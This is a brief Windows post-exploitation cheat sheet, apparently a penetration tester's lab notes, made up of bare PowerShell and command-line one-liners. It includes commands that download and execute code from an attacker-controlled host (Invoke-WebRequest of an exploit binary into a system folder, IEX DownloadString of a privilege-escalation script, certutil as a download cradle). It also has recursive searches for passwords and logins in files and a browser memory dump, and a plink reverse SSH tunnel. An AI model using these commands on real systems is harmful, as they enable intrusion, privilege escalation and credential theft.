Windows

Powershell
Command Line
Impacket
PE Tools
Powershell

Searching

Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login

Download

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"

Execution

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

Recurse List the access file

gci -recurse –include *.* | select Fullname
Command Line

Search file

dir abc.txt /s /p
findstr /i /s "password" *.*
#Answer the promot message with "y"
cmd.exe /c echo y | plink.exe -ssh –l username –pw password –R

download a file

certutil.exe - urlcache -split -f http://ip/file file